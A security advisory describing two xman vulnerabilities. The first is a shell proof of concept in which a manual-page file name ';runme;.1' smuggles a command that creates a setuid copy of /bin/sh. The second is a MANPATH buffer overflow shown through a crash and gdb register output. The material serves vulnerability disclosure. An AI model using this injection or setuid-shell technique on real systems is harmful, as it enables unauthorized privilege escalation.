COMMAND

    xman

SYSTEMS AFFECTED

    xman

PROBLEM

    'Vade79' found the following.  xman doesn't drop privileges anywhere
    in the program, but does support suid installation.  So, exploiting
    via a system call is much easier than the buffer overflow in MANPATH
    mentioned in some earlier advisories.  Here is an example of such an
    exploitation possibility:

    #!/bin/sh
    # example of xman exploitation. xman
    # supports privileges.  but, never
    # drops them.
    # Vade79 -> v9@realhalo.org -> realhalo.org.
    #
    # What this proof of concept demonstrates (reviewer notes):
    # the weakness is not memory corruption but a privileged program
    # handing attacker-controlled file names to a shell.  Everything the
    # PoC needs is a manual tree the caller owns and a file name that
    # contains shell metacharacters.  Whether the name actually reaches
    # a shell unquoted is inferred from the advisory's "system call"
    # remark, not shown here -- confirm against the xman source.
    #
    # Redirect xman's manual search path to a directory under the caller's control.
    MANPATH=~/xmantest/
    mkdir -p ~/xmantest/man1
    cd ~/xmantest/man1
    # The manual page "name" is the payload: the ';' characters turn the
    # file name into separate shell commands if it is interpolated into a
    # command line without quoting.
    touch ';runme;.1'
    # The script that the crafted name invokes; it simply copies a shell
    # and marks it setuid for the caller, so success is visible on disk.
    # (The heredoc body is file content, not part of this script.)
    cat << EOF >~/xmantest/runme
    #!/bin/sh
    cp /bin/sh ~/xmansh
    chown `id -u` ~/xmansh
    chmod 4755 ~/xmansh
    EOF
    chmod 755 ~/xmantest/runme
    # The trigger is interactive: the user must select the crafted page in
    # the xman UI; nothing happens without that click.
    echo "click the ';runme;' selection," \
    "exit.  then, check for ~/xmansh."
    xman -bothshown -notopbox
    # Remove the scratch manual tree afterwards (the copied shell is left).
    rm -rf ~/xmantest
 
    'KF' added the following.  xman from at least
    X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow.

    [root@linux lib]# ls -al `which xman`
    -rwxr-sr-x    1 root     man         41076 Jun 17  1998
    /usr/X11R6/bin/xman*
    
    [root@linux lib]# xman
    [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
    [root@linux lib]# xman
    Xman Error: Could not allocate memory for manual sections.
    
    [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
    [root@linux lib]# xman
    Segmentation fault
    
    [root@linux lib]# gdb xman
    GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    (gdb) run
    Starting program: /usr/X11R6/bin/xman
    0x4022fb66 in getenv () from /lib/libc.so.6
    (gdb) bt
    #0  0x4022fb66 in getenv () from /lib/libc.so.6
    #1  0x0804bc47 in _start ()
    #2  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141
    
    (gdb) info registers
    eax            0xbffee784       -1073813628
    ecx            0x804fb29        134544169
    edx            0x805414c        134562124
    ebx            0x40328f2c       1077055276
    esp            0xbffec6fc       0xbffec6fc
    ebp            0xbffec714       0xbffec714
    esi            0x6      6
    edi            0x41414141       1094795585
    eip            0x4022fb66       0x4022fb66

SOLUTION

    Nothing yet.